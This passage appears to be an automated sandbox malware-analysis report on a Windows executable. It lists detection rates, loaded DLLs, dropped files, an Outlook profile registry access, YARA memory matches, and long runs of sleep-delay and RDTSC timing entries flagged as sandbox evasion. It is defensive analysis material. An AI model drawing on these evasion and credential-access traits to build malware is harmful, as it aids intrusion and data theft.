              Source: C:\Users\user\Desktop\grrezORe7h.exeFile created: C:\Users\user\AppData\Local\Temp\nsuC32C.tmpJump to behavior
              Source: grrezORe7h.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\grrezORe7h.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: grrezORe7h.exeReversingLabs: Detection: 55%
              Source: grrezORe7h.exeVirustotal: Detection: 68%
              Source: C:\Users\user\Desktop\grrezORe7h.exeFile read: C:\Users\user\Desktop\grrezORe7h.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\grrezORe7h.exe "C:\Users\user\Desktop\grrezORe7h.exe"
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess created: C:\Users\user\Desktop\grrezORe7h.exe "C:\Users\user\Desktop\grrezORe7h.exe"
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess created: C:\Users\user\Desktop\grrezORe7h.exe "C:\Users\user\Desktop\grrezORe7h.exe"Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Benchership141.lnk.0.drLNK file: ..\..\..\mindevrdigt\boghandlermedhjlperens.tor
              Source: C:\Users\user\Desktop\grrezORe7h.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: grrezORe7h.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000000.00000002.2135234912.00000000035B7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2989457326.00000000016C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2135234912.0000000002A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Leawill27\Phonobsning.Nub, type: DROPPED
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
              Source: C:\Users\user\Desktop\grrezORe7h.exeFile created: C:\Users\user\AppData\Local\Temp\nsuC465.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\grrezORe7h.exeAPI/Special instruction interceptor: Address: 3697192
              Source: C:\Users\user\Desktop\grrezORe7h.exeAPI/Special instruction interceptor: Address: 2347192
              Source: C:\Users\user\Desktop\grrezORe7h.exeRDTSC instruction interceptor: First address: 3658E9C second address: 3658E9C instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F67646BFB68h 0x00000006 test ch, ah 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\grrezORe7h.exeRDTSC instruction interceptor: First address: 2308E9C second address: 2308E9C instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F6764F455F8h 0x00000006 test ch, ah 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\grrezORe7h.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeMemory allocated: 34560000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeMemory allocated: 36560000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 599765Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 599547Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 599094Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 598984Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 598875Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 598765Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 598656Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 598547Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 598437Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 598328Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 598218Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 598109Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 598000Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 597889Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 597781Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 597672Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 597547Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 597437Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 597328Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 597219Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 597094Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 596984Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 596873Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 596765Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 596656Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 596547Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 596437Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 596328Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 596219Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 596109Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 596000Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 595890Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 595781Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 595672Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 595562Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 595446Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 595343Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 595234Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 595124Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 595015Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 594906Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 594797Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 594687Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 594578Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeWindow / User API: threadDelayed 1704Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeWindow / User API: threadDelayed 8152Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsuC465.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\grrezORe7h.exeAPI coverage: 2.9 %
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -26747778906878833s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7996Thread sleep count: 1704 > 30Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -599875s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7996Thread sleep count: 8152 > 30Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -599765s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -599656s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -599547s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -599437s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -599328s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -599219s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -599094s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -598984s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -598875s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -598765s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -598656s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -598547s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -598437s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -598328s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -598218s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -598109s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -598000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -597889s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -597781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -597672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -597547s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -597437s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -597328s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -597219s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -597094s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -596984s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -596873s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -596765s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -596656s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -596547s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -596437s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -596328s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -596219s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -596109s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -596000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -595890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -595781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -595672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -595562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -595446s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -595343s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -595234s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -595124s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -595015s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -594906s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -594797s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -594687s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976Thread sleep time: -594578s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405846
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_004027FB FindFirstFileW,4_2_004027FB
              Source: C:\Users\user\Desktop\grrezORe7h.exeCode function: 4_2_00406398 FindFirstFileW,FindClose,4_2_00406398
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 599765Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 599547Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Users\user\Desktop\grrezORe7h.exeThread delayed: delay time: 599219Jump to behavior
